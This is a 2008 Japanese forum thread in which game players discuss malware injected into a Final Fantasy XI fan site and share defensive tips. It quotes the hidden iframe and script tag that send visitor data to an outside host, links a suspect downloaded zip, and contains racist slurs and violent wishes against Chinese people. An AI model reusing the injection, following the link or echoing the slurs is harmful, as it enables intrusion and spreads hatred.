さすがに運営自らゲームマネー生成してRMT会社に売ってるような犯罪集団にまでは落ちてないだろうw

159 :既にその名前は使われています:2008/04/29(火) 04:02:19.42 ID:nvzSxg4Y
ヴァナモン踏んだ後に、すぐPOLパス変更して、Firefoxとnoscriptいれて
いまウィルススキャン中ー PG2はアクセスできぬ・・・
とりあえず寝るので俺も何かわかったら報告しる 回線はひっこぬいとくかな

160 :既にその名前は使われています:2008/04/29(火) 04:03:12.70 ID:HV+2Gsxp
>>156
うちらに挨拶ない業者(海外IP零細業者)は徹底的に潰します!
癌呆RMTがんばってます!
ってのは、穿った見方?w

161 :既にその名前は使われています:2008/04/29(火) 04:03:15.01 ID:8nsLS8jY
BANした数とか水増ししてそうだけどなぁw

162 :既にその名前は使われています:2008/04/29(火) 04:04:24.33 ID:23xj3sgk
>>158
それでも個人レベルでの癒着は疑う余地があるからなー・・・
キャップ磨き・ワープで繰り返しクエ・潮干狩りと明らかに特定のコンテンツが用意されてるし。

なんか仕掛けるなら対中感情悪化してる今じゃね

163 :既にその名前は使われています:2008/04/29(火) 04:05:49.70 ID:63lCFU83
>>153
中華自ら作った罠サイトを無害化したクラッカーのことか。
今回のどーなってんだろ、ヴァナモンのサイトスペース内に
罠ページねじ込ませてるしな。
ヴァナモンのサイトパス解析してさらに該当ページ駆除?

164 :既にその名前は使われています:2008/04/29(火) 04:06:13.51 ID:8dHmli/6
今日踏んじまった
Peerguardian2のサイトつながらないたすけて

165 :既にその名前は使われています:2008/04/29(火) 04:07:07.23 ID:IZPAD3KT
いつもいってるようなとこがなると嫌だな
糞中華死ねよまじで

166 :既にその名前は使われています:2008/04/29(火) 04:07:38.67 ID:cRh9+w69
ついにここまできたかって感じだな。
RMTer特に、買い手は日本人だけ規制しても海外の買い手がいたら業者は
締め出せないから、いまこそ、問題を切り分け各個撃破するフェーズに!
国別サーバーの必要性を訴えねばならん。

167 :既にその名前は使われています:2008/04/29(火) 04:08:35.72 ID:WcBUBXPW
これウィルスソフトを潜って来そうな匂いがプンプンするわ
踏んだはずなのに全然見つからん

168 :既にその名前は使われています:2008/04/29(火) 04:11:27.98 ID:OkzY1YDc
ログオフしないことでこの問題は回避した

169 :既にその名前は使われています:2008/04/29(火) 04:13:33.69 ID:6aNOosh3
後からログインした方が優先されちゃうマジック

170 :既にその名前は使われています:2008/04/29(火) 04:15:33.71 ID:FISOh32K
ログインしてれば他からログインされたらわかるし!

171 :既にその名前は使われています:2008/04/29(火) 04:17:01.22 ID:qgZVizEj
こんな事になったのもギルを買う人が居るからです。
周りでRMTやってる奴、ネ実でRMTを肯定してる奴が居たら
徹底的に潰しましょう。ダニはぷちっとね!

172 :既にその名前は使われています:2008/04/29(火) 04:21:05.97 ID:Klh8jK6J
ぶっちゃけ買い手も特亜人
長野に大量に沸いてただろ

173 :既にその名前は使われています:2008/04/29(火) 04:21:15.80 ID:nvzSxg4Y
たしか他人からログインされると、別の人がアクセスしたので終了します。
みたいなエラーメッセでるんだよな。

174 :既にその名前は使われています:2008/04/29(火) 04:21:38.60 ID:WcBUBXPW
ヴァナモンまだ見れるのか

175 :既にその名前は使われています:2008/04/29(火) 04:22:14.55 ID:cRh9+w69
RMTが犯罪を助長することが証明されたんだから、
法律で禁止しないとね。

176 :既にその名前は使われています:2008/04/29(火) 04:23:14.62 ID:WcBUBXPW
ウィルス一個発見

177 :既にその名前は使われています:2008/04/29(火) 04:23:49.96 ID:Xvub7qeL
ブラウザ:スレイプニ(IEエンジン使用)

#設定
JAVAスクリプト:使用不可
アクティブX:使用不可
ダイレクトX:使用不可
クッキー:おk

上記に設定しているけど、これでも危ないのかなぁ(・ω・)?

178 :既にその名前は使われています:2008/04/29(火) 04:24:46.70 ID:Zc1rPDyg
>>176
kwsk

179 :既にその名前は使われています:2008/04/29(火) 04:25:40.76 ID:h7BVNnFb ?2BP(20)
普通後からログインしようとした方に二重ログインだと言って弾くよな…
この糞仕様を知って愕然とした…

180 :既にその名前は使われています:2008/04/29(火) 04:26:15.50 ID:WcBUBXPW
何のウィルスか全部スキャン終わってからじゃないと見れない

181 :既にその名前は使われています:2008/04/29(火) 04:28:07.90 ID:lT/QJXN0
IEエンジンて時点でだめぽな気がw

しかし、またバナモンやられたのか。
この前も気付くの遅くて対応遅れただろ。
なんも学習してないのな。

182 :既にその名前は使われています:2008/04/29(火) 04:28:29.75 ID:FISOh32K
>>173
エラーコード:POL-1039
現在ログイン中のプレイオンラインIDで
他の端末からもログインされたため
プレイオンラインから接続が切断されました。

183 :既にその名前は使われています:2008/04/29(火) 04:31:09.24 ID:Klh8jK6J
スクエニはシナに現地法人(人質)とられてるから
シナIP切断は出来ないよ
まあいずれは他の企業と同じように会社ごとぶん取られて泣きを見るだろうけど

あと間違いなく本社の内部にもいる
あいつら学歴だけはやたら高いからな

184 :既にその名前は使われています:2008/04/29(火) 04:32:22.29 ID:+8sfA5Qr
>>177
この件に関してはとりあえず大丈夫

185 :既にその名前は使われています:2008/04/29(火) 04:32:31.08 ID:NrdoOuZQ
ヴぁなもん管理人を責めることはできんだろ

186 :既にその名前は使われています:2008/04/29(火) 04:32:46.57 ID:hfXzCGjY
おいい、ハンマー投げが部員の頭直撃の次はアーチェリーの矢が頭に刺さったのかyp

187 :既にその名前は使われています:2008/04/29(火) 04:33:10.19 ID:hfXzCGjY
すまんごばk

188 :既にその名前は使われています:2008/04/29(火) 04:34:22.17 ID:infg+3MU
ルネッサンスですね?wwwwww

189 :既にその名前は使われています:2008/04/29(火) 04:34:29.68 ID:5lcc7yup
Peerguardian2更新しようとしたら更新失敗2無効4になった。
どうなってんだ、ボスケテ・・・。

190 :既にその名前は使われています:2008/04/29(火) 04:35:05.93 ID:63lCFU83
該当ページ修正したとしてもまたハックされかねないよな。
パスはどうやって漏れたんだろう。

191 :既にその名前は使われています:2008/04/29(火) 04:36:08.98 ID:hfXzCGjY
>>189
URLあってるのか?

192 :既にその名前は使われています:2008/04/29(火) 04:36:32.56 ID:nvzSxg4Y
カスペルスキーのトライアル版でスキャン中に、Antinny,ae Antinny,j ってのを発見駆除した。
解説みると被害はあんまりないワームらしいが・・・・。
つうかカスペルスキーのウィルス発見時のサウンド?女の恐ろしい悲鳴なんだな・・・w

ウィルスみつけたショック+すごい悲鳴で立ち直れなくなるんじゃないか?コレ・・・w


193 :既にその名前は使われています:2008/04/29(火) 04:36:59.25 ID:bKVoid2q
PG2配布してる鯖落ちてるっぽいな

>>189
何回かやってみれ。

194 :既にその名前は使われています:2008/04/29(火) 04:38:27.95 ID:t7aR5C9a
> PG2配布してる鯖落ちてるっぽいな

落ちてるんじゃない、落とされたんだってのは考えすぎかな

195 :既にその名前は使われています:2008/04/29(火) 04:39:29.69 ID:lekLbtDV
もうFF用のPCは完全にネット閲覧環境排除するか・・・
窓化して横ですばやく調べるのが便利だったのだが・・・
ちくしょう


196 :既にその名前は使われています:2008/04/29(火) 04:41:38.01 ID:U8JY7+aF
>>179
それやっちゃうと、ゴーストが残った時に消えなくなるんだよ。
なんかで切断してゴーストが残ったあと、5〜10分くらい消えないネトゲとかあっていらいらした。
ハッキングを考えなければ、あとからログインした方を優先した方が何かと便利。
この仕様のままハッキング対策をするとなると(緊急垢凍結など)、それなりに人手がかかるからなあ。
今の社長やプロデューサーの田中がそんなことさせるかねえ。金がかかることは大嫌いだからな。

197 :既にその名前は使われています:2008/04/29(火) 04:42:27.41 ID:Xvub7qeL
>>181,184
レスサンクスです。

ちびっと安心しました(・∀・)

198 :既にその名前は使われています:2008/04/29(火) 04:43:57.72 ID:18lv04K1
>>177
ウインでネットするじたいセキュリティには無関心というほかない。
しかしIE(系)を使わない事で0.1%セキュリティが少しましになる。
これはセキュティがアップするんじゃなく、マイナスだったものが0.1%少しましになる程度。
またウインを使ってる限り他osの最低レベルのセキュティ度を超える事もない。
まずは、ウインでネットをしないことつながない事。
やむ終えずネットに繋ぐならIE(系).OEは使わない。
この辺は毎日朝起きたら歯を磨くのと同じで常識の範囲


199 :既にその名前は使われています:2008/04/29(火) 04:44:48.01 ID:eFdRwpud
ところで件のトロイってパス抜きするだけ?
PS2ユーザなら無問題なの?

200 :既にその名前は使われています:2008/04/29(火) 04:45:09.68 ID:cRh9+w69
警告のために、有名FFサイトへのアクセス自粛と情報収集を促すべく
ここのURLを張って回ったほうがいいかね。人多そうなスレに。

201 :既にその名前は使われています:2008/04/29(火) 04:46:18.06 ID:hfXzCGjY
各々の鯖スレにはっていけばいいんじゃね?

202 :既にその名前は使われています:2008/04/29(火) 04:46:25.29 ID:+rUCpUjc
PeerGuardian 2 RC1 Test2-2

http://cowscorpion.com/Firewall/PeerGuardian.html



203 :既にその名前は使われています:2008/04/29(火) 04:46:47.29 ID:kGFiS4fP
ウイン(笑)

204 :既にその名前は使われています:2008/04/29(火) 04:47:05.31 ID:63lCFU83
>>199
パソコンでアカウント情報入力してなけりゃ多分平気。

205 :既にその名前は使われています:2008/04/29(火) 04:49:17.75 ID:NrdoOuZQ
>>198
はいはい寝ましょうね

206 :既にその名前は使われています:2008/04/29(火) 04:51:20.52 ID:eFdRwpud
>>204
そっかー。ありがとー!

207 :既にその名前は使われています:2008/04/29(火) 04:53:11.03 ID:5lcc7yup
>>191.193
どうやら成功した模様、トンクス。

でもスキャンしたら現時点で2つ見つかったぜ・・・。
マジ中華は腐ってる・・・。

208 :既にその名前は使われています:2008/04/29(火) 04:54:38.15 ID:+NGkSzYZ
>>192
初めて聞いた時は真夜中で、凄く怖くてうろたえまくったよ。危機感を煽るには最適かもしれんw

209 :既にその名前は使われています:2008/04/29(火) 04:57:22.14 ID:WOdDi+EO
IEのデフォルトってIFRAMEは実行時ダイアログ表示になってない?
みんなダイアログで実行するを選んで感染してるの?

210 :既にその名前は使われています:2008/04/29(火) 05:03:30.15 ID:xGE1p4rM
>>177
スレイプニルはIEベースだから俺は念の為Firefoxに変えた。
Firefoxも使ってみるとスレイプニルに似てるから慣れれば楽に使えるし
乗り換えた方が良いかもね。

取り合えずカスペルスキーでウィルススキャンかな。

211 :既にその名前は使われています:2008/04/29(火) 05:08:02.17 ID:UUrf4YMz
>>210
OperaもIEベースなのかな
この手のスレでOperaの話全然出ないから分からない

212 :既にその名前は使われています:2008/04/29(火) 05:08:44.62 ID:tJSRB5j8
>>159
>>38


213 :既にその名前は使われています:2008/04/29(火) 05:09:37.30 ID:fXrWze/8
ガンガンageていこうか


214 :既にその名前は使われています:2008/04/29(火) 05:10:21.19 ID:tJSRB5j8
>>164
>>38

少し上のレスを読んだり、垢ハックスレのテンプレくらい見ようや。

215 :既にその名前は使われています:2008/04/29(火) 05:11:25.69 ID:WwABdoOK
>>211
Opera使いだがIEエンジンじゃないよ
オールインワンで使いやすいのでおすすめですよ

216 :既にその名前は使われています:2008/04/29(火) 05:16:32.98 ID:tJSRB5j8
>>211
オペラと炎狐はIEエンジンベースじゃない。
垢ハックスレに推奨ブラウザとしてテンプレにのってある。

217 :既にその名前は使われています:2008/04/29(火) 05:17:17.23 ID:NrdoOuZQ
IEエンジン自体に問題があるというより、IEのデフォルトの設定が良くない
アップデートをした上で、きちんと調べて設定しなおせば最近は他のブラウザと大差ない
ただ拡張性で他のブラウザの方が勝るというだけ

218 :既にその名前は使われています:2008/04/29(火) 05:20:24.10 ID:UUrf4YMz
>>215
サイトごとにインラインフレームoffにはしてるんだけど
新しいタブ開いてメニューを開くとなぜかインラインフレームにチェックが入ってる

Opera使ってるならこれやっとけっていうのあったら教えてください

219 :既にその名前は使われています:2008/04/29(火) 05:20:48.95 ID:Y6nBvu98
毎回非IEだから安心みたいな話になるけど
javaスクリプト許可になってればどれも同じでしょ?

220 :既にその名前は使われています:2008/04/29(火) 05:21:35.63 ID:tJSRB5j8
IEデフォルトはみつめるにフィルタかかってないような状態。

221 :既にその名前は使われています:2008/04/29(火) 05:22:01.98 ID:6aNOosh3
IEの脆弱性を突いて悪さするソフトを入れる事が多い

222 :既にその名前は使われています:2008/04/29(火) 05:24:50.04 ID:Y6nBvu98
>>221
じゃあ一連のハック騒ぎでは
非IEエンジンならjavaスクリプト許可していても問題なし?

223 :既にその名前は使われています:2008/04/29(火) 05:25:34.18 ID:gJSdmhMb
>>218
設定でoffにしていればそんな事にはならないよ

224 :既にその名前は使われています:2008/04/29(火) 05:26:09.31 ID:zLn1sPhr
OSのちがいでセキュリティに無関心だとかバカじゃないのかw?
どんなOS、ブラウザでも穴はあるしなにが危険かを理解してセキュリティ構築しなきゃ話にならん
こないだ最新のMacが2分でハックされたりしてたしな


225 :既にその名前は使われています:2008/04/29(火) 05:26:49.08 ID:6aNOosh3
>>222
わがんねー
今回のは環境情報(使用ブラウザとかOS)とか送信した上で何かする仕組みみたいだし、
被害受ける確率が低くなるっていうだけアルよ

226 :既にその名前は使われています:2008/04/29(火) 05:27:43.22 ID:NXzHZ1Ry
>>222
簡単に言えばPCに何かさせるのがプログラムだ
セキュリティという観点から見れば
PCで何かさせる動作を読み込むモノは全て狙われると言っても良い

227 :既にその名前は使われています:2008/04/29(火) 05:29:27.61 ID:cG+htABj
>>218
ツール→設定→詳細設定
コンテンツのところでJavaScriptのチェックボックス外す
同じとこのスタイルオプションっていうボタン押すと表示設定出来るから
そこでインラインフレームの表示のチェックボックス外す。

228 :既にその名前は使われています:2008/04/29(火) 05:30:04.28 ID:2cRqjz3L
うわーやべー
ヴァナモンでモンスサーチ使ってたよ!!
今PS2でPOLのパス変えようとしたら
POL-1364エラーで変更出来ね

229 :既にその名前は使われています:2008/04/29(火) 05:30:37.53 ID:cG+htABj
>>218
あとサイト別に許可出したいなら、サイト設定の編集から個別に調整できる。

230 :既にその名前は使われています:2008/04/29(火) 05:31:50.62 ID:xGE1p4rM
>>219
他に変えれば安心と言う訳でもないけど
IEは穴だらけな上に使用ユーザー多いから狙われやすい。

ちょっと古い記事だけど↓
http://itpro.nikkeibp.co.jp/article/COLUMN/20060130/228167/

231 :既にその名前は使われています:2008/04/29(火) 05:32:48.26 ID:Xvub7qeL
>>210
おきにぃとかの移動が大変なので、とりまFirefoxインスコトロールして
慣れるまでFF関係のサイト専用で使ってみるです。
垢ハクされてからぢゃ遅いですもんね。
ありがちょん(・∀・)b

232 :既にその名前は使われています:2008/04/29(火) 05:32:54.21 ID:L70eDoY4
ヴァナモンに仕込まれたスクリプトは IP アドレスや OS 情報をデータ収集用サイトに送信するだけ
収集用サイトが、受け取った IP と OS に対応した攻撃手段で攻撃してくる

ブラウザの脆弱性はまったくついてないので、IE も FireFox も Opera も対象になるし、Web ページ
を対象としたウィルスチェック系では検出されず、ブラックリストサイトのチェックツールやファイアー
ウォール系の保護ツールを導入していないと飛んでくる外部からの攻撃に対応できない

……これであってる?


233 :既にその名前は使われています:2008/04/29(火) 05:33:02.80 ID:Y6nBvu98
>>225-226
非IEでも結局javaスクリプト不可にするのなら
IEで同様に不可にしてるのと同じではないの?
やたらと非IEをすすめられるけど
いまいちピンとこないんだよなあ。
バカでごめん。

234 :既にその名前は使われています:2008/04/29(火) 05:34:18.35 ID:WwABdoOK
>>218
アドレス窓にopera:configでエンターでコンフィグから
Extensions→IFramesのチェックはずせばインラインフレーム使わなくなるよ

235 :既にその名前は使われています:2008/04/29(火) 05:35:16.79 ID:xGE1p4rM
カスペルスキーのトライアル版が本来なら30日間な物が今ならルーレットチャレンジで
45・60・90日間になる!って言うからルーレットさっきから回してんだけど・・・・

90日こねぇwww

>>231
スレイプニル→Firefoxのインポート・エクスポートは出来ないけど、
IE経由で移動させりゃいいじゃんw
ニルからIEにうつして、IEからFirefoxに丸々移せるよ。

236 :既にその名前は使われています:2008/04/29(火) 05:37:16.11 ID:WcBUBXPW
どういうウィルスなのかわかんね
FFにインできるのこのPC1台だけだし終わったか

237 :既にその名前は使われています:2008/04/29(火) 05:37:44.59 ID:IUkUSzcn
>>235 90日のはちゃんと来るから、何度もやるんだ

238 :既にその名前は使われています:2008/04/29(火) 05:37:46.05 ID:Jm5RVJN/
ヴァナモン
他人が管理会社にお願いしたくらいじゃ止めてもらえないのかね
俺がデキル■の人なら「我が社の顧客に重大は影響を及ぼす恐れがある」とかって、一時停止お願いするけどな

239 :既にその名前は使われています:2008/04/29(火) 05:39:09.07 ID:NXzHZ1Ry
>>233
悪さをしようとすれば、ActiveXやCookieなどを使っても出来る
が、今回はウィルスに関してなのでこれは割愛する。

携帯なら分かりやすいか
電話をするだけなら、あんなに機種いらないだろ?
でも、実際は機能の差がある
使い方や設定次第では同じようなことができるが
その方法がめんどくさかったり手間が掛かったりするわけだ

240 :既にその名前は使われています:2008/04/29(火) 05:39:32.16 ID:9o6nOGSO
>>238
そりゃ無理だろ。
悪用された場合に、区別つかなくなるし。

スクエニに不利なことが書いてあるサイトに同じ文言で通用しちゃ、やばいだろ?

241 :既にその名前は使われています:2008/04/29(火) 05:39:41.54 ID:NrdoOuZQ
>>233
俺が>>217で書いたけど、Javascriptに関してはそれであってる
ただしActiveXやASP等のプログラムが動作しやすいということは事実
この辺もちゃんと切っておけばそこまで問題はない

242 :既にその名前は使われています:2008/04/29(火) 05:41:03.12 ID:6gn7nHUS
ヴァナモンの中の人ー
朝ですよう
おきなさいよう

243 :既にその名前は使われています:2008/04/29(火) 05:43:01.71 ID:B+FyjPLx
もしこれが、ヴァナモンの自作自演だとしたら・・・?

244 :既にその名前は使われています:2008/04/29(火) 05:43:06.25 ID:NrdoOuZQ
>>228
POL-1364はネットワーク関連のエラーらしいぞ
接続確かめてみ

245 :既にその名前は使われています:2008/04/29(火) 05:43:20.49 ID:Jm5RVJN/
>>240
管理会社と■なら仕込みの検証可能だろ
それでもダメなのか・・・

246 :既にその名前は使われています:2008/04/29(火) 05:43:32.24 ID:26WFcPsS
ちなみにどこのページなんだろ…
サーチからのTOPって…
いろいろ見てるけどソースにCNZZなんてないんだが…

247 :既にその名前は使われています:2008/04/29(火) 05:45:45.09 ID:Jm5RVJN/
>>242
商店街の福引で何故かゴールデンウィーク出発の海外旅行当たって留守だったりしてw

248 :既にその名前は使われています:2008/04/29(火) 05:48:34.75 ID:xGE1p4rM
>>237
やっとキタ!おらこれで夜通しスキャンさするだ・・・
ってもう朝か・・・

249 :既にその名前は使われています:2008/04/29(火) 05:48:51.66 ID:NrdoOuZQ
>>246
エリア別モンスターサーチのリンク先の
エリア別詳細 と書いてある左上のフレームに
<iframe src=top.htm height=0 width=0></iframe>
が仕込まれてる。top.htmはクラッカーが仕掛けたであろうページで
<script src='http://s111.cnzz.c○m/stat.php?id=508863&web_id=508863' language='JavaScript' charset='gb2312'></script>
がさらに仕込まれている。

250 :既にその名前は使われています:2008/04/29(火) 05:52:23.30 ID:2cRqjz3L
>>244
何回もやり直してやっと変更できた
POL鯖が重いのかな

Iframeって結局何なの?
ページ内にページを埋め込むってこと?

251 :既にその名前は使われています:2008/04/29(火) 05:52:46.56 ID:KW20rXlu
あーあ終わったな
ハックされてたら手続きだりーし
完全復旧じゃないみたいだし引退しよ

252 :既にその名前は使われています:2008/04/29(火) 05:54:27.82 ID:U/SyDUoH
>>164
繋がらないね、混んでるのかな?

253 :既にその名前は使われています:2008/04/29(火) 05:54:53.32 ID:I9fkXjgL
ゴールデンウィーク突入でサポセン休みなるのかな?それ狙ってこの時期にウィルス仕込んだんだったら頭いいな。

254 :既にその名前は使われています:2008/04/29(火) 05:56:05.93 ID:tJSRB5j8
>>250
PS2の場合はケーブル抜き差しで改善されるお。

255 :既にその名前は使われています:2008/04/29(火) 05:58:18.30 ID:ew0Q5C/A
今日が昭和の日だからと言う線もあるんじゃね?
特亜ってそういうところを突いてくるの好きだから

256 :既にその名前は使われています:2008/04/29(火) 05:59:19.43 ID:26WFcPsS
>>259
ありがとう〜

257 :既にその名前は使われています:2008/04/29(火) 06:01:30.38 ID:v2PDDYFE
早く中国に核落とせ
あいつらは害虫以下
生きてる価値なし

258 :既にその名前は使われています:2008/04/29(火) 06:02:00.38 ID:gJSdmhMb
>>250
そう。
そのフレームを0にして埋め込んであるから通常では気が付かない
罠の仕組まれたページを開いただけで一見いつもと変わりないのに
知らずに罠ページを呼び出され実行されてるって事

259 :既にその名前は使われています:2008/04/29(火) 06:07:07.68 ID:Xz7OiwMN
シナチク明日殺す

260 :既にその名前は使われています:2008/04/29(火) 06:10:07.20 ID:CT9wio9h
これって犯罪なんじゃないの?
何で捕まらないの?

261 :既にその名前は使われています:2008/04/29(火) 06:10:39.59 ID:v2PDDYFE
国家的に公認されてるから

262 :既にその名前は使われています:2008/04/29(火) 06:10:53.65 ID:XkyZsVru
ざっとソースを見てみたけど、下の情報をJavaScriptでクライアントから取得して
IMGタグのURLのパラメータとして、送ってるっぽいね。

navigator.userAgent
document.referrer
navigator.appName
navigator.systemLanguage
navigator.platform
navigator.appVersion
screen.width
screen.height

この情報を元にして、動的に攻撃手法を切り替えてるのかね。
今までは、1つのページに数種類埋め込んでたりしたけど、
若干、進化して来たのかな。


263 :既にその名前は使われています:2008/04/29(火) 06:13:36.30 ID:WcBUBXPW
ヴァナモンサイト3月にもなんかあったのか?

264 :既にその名前は使われています:2008/04/29(火) 06:14:53.03 ID:kx31xmTk
これいつからやばいんだよ
つーか自分がやばいのかどうかすらわからねー

265 :既にその名前は使われています:2008/04/29(火) 06:17:18.37 ID:L70eDoY4
自分で書くのもアレなんだが >>90, >>232 ぐらい見て


266 :既にその名前は使われています:2008/04/29(火) 06:17:35.78 ID:FA1kENKI
パス変更して手打ちで毎回ログインするようにするだけでも結構違うと思うぜ

267 :既にその名前は使われています:2008/04/29(火) 06:17:42.90 ID:WcBUBXPW
>>42

268 :既にその名前は使われています:2008/04/29(火) 06:21:30.01 ID:KA50Ku9I
* 危険だと思う人、予防しておきたい人、情報が欲しい人はなるべく>>1から読みましょう *

269 :既にその名前は使われています:2008/04/29(火) 06:24:25.61 ID:hfXzCGjY
>>263
ヴァナモンブログのほうの改竄

270 :既にその名前は使われています:2008/04/29(火) 06:26:40.56 ID:U4251PCt
ttp:だぶるすらっしゅff11.s33.xrea.com/

↑これ踏んでもアウトってこと?

271 :既にその名前は使われています:2008/04/29(火) 06:27:14.02 ID:L70eDoY4
>>262 手法が変わったのに対しては、色々予測できるが

・同じ手法を続けても対策されてしまうから
・FF11 のアカウント以外も狙えるから
・OS を落とせばその先に進めるから
  (今時ないだろうが)パケットキャプチャで見える範囲にいる PS2 や Xbox360 も狙える
  Windows のネットワーク共有等を経由している PS2 や Xbox360 のアカウントも狙える


272 :既にその名前は使われています:2008/04/29(火) 06:27:49.01 ID:23SNv0JZ
PG2ってVistaにも入れられる?

273 :既にその名前は使われています:2008/04/29(火) 06:27:55.50 ID:o3MzlRdU
ミミズのレベル調べるためにヴァナモンつかっちゃtったあああああああああ
めちゃくちゃやばいいいいいいいいいいいいい;;

274 :既にその名前は使われています:2008/04/29(火) 06:35:12.79 ID:Wji3QV6h
正直noscriptもPG2もウザい
でも凄く役に立ってるのよね・・
シナしね
君もさっさと導入しなさい


275 :既にその名前は使われています:2008/04/29(火) 06:42:18.24 ID:kLse6GM8
誰もまとめようとしないのでまとめた

○ヴァナモンに仕込まれたウィルスはIPとOSとブラウザ情報を送るだけ
○ファイアーウォールソフトを入れてるなら不審なアクセスを遮断すればとりあえずは安全


276 :既にその名前は使われています:2008/04/29(火) 06:42:51.87 ID:jcgdStKp
地球の害虫シナ豚ども死ねやああああああああああああ

277 :既にその名前は使われています:2008/04/29(火) 06:42:57.27 ID:zpTNVlZo
firefoxでnoscript入れてる人に質問なんだが
iframe禁止にチェックしても下のサイトとかで普通にiframe有効になるんだけど・・
他の人は禁止反映してる?
ttp://heo.jp/tag/page/iframe.html

278 :既にその名前は使われています:2008/04/29(火) 06:43:36.75 ID:WcBUBXPW
IPとOSとブラウザ情報送るってウィルスなのか?

279 :既にその名前は使われています:2008/04/29(火) 06:46:09.26 ID:2cRqjz3L
ふむ
つまり踏んじゃったらとりあえずルーターリセットしてIP変えろってことか

280 :既にその名前は使われています:2008/04/29(火) 06:49:26.47 ID:EPvnMt+Z
PG2の日本語化パッチくださいな
配布サイトに繋がらん

281 :既にその名前は使われています:2008/04/29(火) 06:51:01.14 ID:KA50Ku9I
>>273

>>56

282 :既にその名前は使われています:2008/04/29(火) 06:51:49.31 ID:+8sfA5Qr
>>262の情報ってアクセス解析でも得られる情報じゃない?
なんでわざわざこっちから送信させてるんだろう。
飛ばせたurlで取得すればすむ話じゃないのかねえ。

283 :既にその名前は使われています:2008/04/29(火) 06:54:49.53 ID:kLse6GM8
JAVAとActiveX切ってるとyoutubeとニコニコ見れないからうぜえええええええええええええ

284 :既にその名前は使われています:2008/04/29(火) 07:06:34.31 ID:2cRqjz3L
>>283
TubePlayerはどうよ?

285 :既にその名前は使われています:2008/04/29(火) 07:20:13.67 ID:NrdoOuZQ
寝る前にあげておくか
とりあえず不安な人はWindowsだけでなくブラウザ,Office,メディアプレーヤー等もアップデート確認しておけ
踏んでしまったかも知れない人は、まずPCを落として、インターネットに接続できない状態でスキャンしろ
その後でネット繋いで即POLのパス変えて、アップデートしときなさい

286 :既にその名前は使われています:2008/04/29(火) 07:22:09.27 ID:ACWUhBku
>>277
aguseで調べたら安全そうだったんで試したが、危険かもって書かれてる
URLなんて踏みたくねーよ。
遮断:heo.jp
許可にしてるのでURLが組み込まれてるのが表示:googlesyndication.com

おまいの設定がおかしんじゃねーの。

287 :既にその名前は使われています:2008/04/29(火) 07:24:59.18 ID:v2PDDYFE
64TienanmenMassacre

288 :既にその名前は使われています:2008/04/29(火) 07:30:36.72 ID:xhix5jXS
中国人しんでくれねーかな・・・・
こんな迷惑ばっかりを世界中にふりまいて喜んでる


289 :既にその名前は使われています:2008/04/29(火) 07:30:44.56 ID:zpTNVlZo
>>286
張ったURLじゃなくてもいいんだけど
例えばiframeタグ解説サイトとかみると全然無効になってない。
iframe禁止にチェック入れるだけだよね?


290 :既にその名前は使われています:2008/04/29(火) 07:33:37.58 ID:26WFcPsS
なんかFX強制終了→セッション再開でH_34641.zipってのダウンロードしたんだが、これ何だ?

291 :既にその名前は使われています:2008/04/29(火) 07:34:53.83 ID:U4251PCt
>>290
\(^-^)/ オワタ

292 :既にその名前は使われています:2008/04/29(火) 07:35:53.79 ID:122RNFgR
RMTの規制がゆるいからなあ
1G以上買ったら一撃バン
これ以上の対策はない

293 :既にその名前は使われています:2008/04/29(火) 07:37:49.94 ID:xhix5jXS
つか今見ちゃったんだけど・・・・・・・どうすればいいんだ?
カスペルスキー入れてるけど暗殺してくれんのか?

294 :既にその名前は使われています:2008/04/29(火) 07:38:23.86 ID:UCOMDpAp
犯罪国家だよなあの国は

295 :既にその名前は使われています:2008/04/29(火) 07:39:01.70 ID:ZzuvbsIT
つうか火狐勧めてる奴らが支那の工作員に見えてくる・・・
裏でハック準備しながら「安全ですよー!火狐は安全ですよー!」って叫んでる感じ

296 :既にその名前は使われています:2008/04/29(火) 07:40:45.00 ID:v2PDDYFE
それはお前の脳みそが足りないからだろ

297 :既にその名前は使われています:2008/04/29(火) 07:41:24.48 ID:doRBTDx0
>>294
国レベルで盗作して海賊版を安価に大量販売して稼いでいる盗賊国

【軍事】ロシアのスホーイSu-27『フランカー』の知的所有権で中露が対立。「提訴も辞さず」とロシア側が警告★2[4/28]
http://mamono.2ch.net/test/read.cgi/newsplus/1209388203/

298 :既にその名前は使われています:2008/04/29(火) 07:44:09.23 ID:1OO22a6s
今回の手法の予測としては
1.FFをプレイしている可能性の高いユーザーのIPアドレスを取得する。
  ついでにOS、ブラウザ情報なんかも取得しとく。
2.取得したIPに対してFWの有無等のセキュリティ状況のチェックをかける
3.セキュリティがざるっぽかったら直接クラッキングをかけてバックドアを仕込む
4.あとはもうやりたい放題
こんな感じなのかな

■e側の不正アクセス対策で考えられるのは前回ログイン時と違うプロバイダでログイン
された場合監視対象とするだと思うんですよ
これをされるといくらパス抜きしてもすぐ足がついて対応されてしまう

バックドアをあければPCをリモート操作するなり、Proxyたてて本人のPCを経由して
ログインで不正ログインをカモフラージュできる
■e側からみれば本人がログインしてるようにしか見えないからね

たぶんまっとうなセキュリティ対策してれば2.の時点で対象からはずされるとおもうけど
直接クラッキングだとどこまで対策してあれば安全とかいえないのが質が悪い

299 :既にその名前は使われています:2008/04/29(火) 07:45:20.63 ID:26WFcPsS
>>291
なんだろこれ
ちとあぶないかもだから踏むなよ

h..p://www8.axfc.net/uploader/15/so/l/119155761053114490890/H_34641.zip

ダウンロード終了時刻が08.4.29 7:30:30 AM
エロサイトとか見てないんだけど、直前にヴァナモンはみてt

300 :既にその名前は使われています:2008/04/29(火) 07:46:40.55 ID:U4251PCt
>>299
勝手にダウンロードしてる時点で糸冬了
さっさとオフラインでちぇっく汁

301 :既にその名前は使われています:2008/04/29(火) 07:46:56.07 ID:rAF28H+9
課金してなければとりあえず安全だよな?
まさかシナが代わりに課金してまでアイテム取るとは思えんし。

302 :既にその名前は使われています:2008/04/29(火) 07:46:59.84 ID:kLse6GM8
ヴァナモンなら被害者も数十人じゃ済まないぞ
■eは休日でお休みとかアフォか??緊急事態だろ



303 :既にその名前は使われています:2008/04/29(火) 07:50:13.60 ID:xhix5jXS
不正アカウントで0円でインするわ、
パス抜きですき放題泥棒するわ

なんなの?この民族?

304 :既にその名前は使われています:2008/04/29(火) 07:51:39.84 ID:WcBUBXPW
さっきカスペのオンラインスキャンした時は1つウィルス発見されたんだが
アヴァスタアンインスコしてカスペ試用版インスコしてスキャンして見たらウィルス発見されず
なんだこれ。。サイトは確かに踏んだんだが

305 :既にその名前は使われています:2008/04/29(火) 07:53:08.10 ID:9cC5HN3C
>>302
■今日休みなのか…
ヴァナモンの件とは関係ない事で苦情のメール送ったら、深夜に自動返信で全く見当違いな内容のメールが届いて頭に来てもう一回メール送ったけど音沙汰無し。

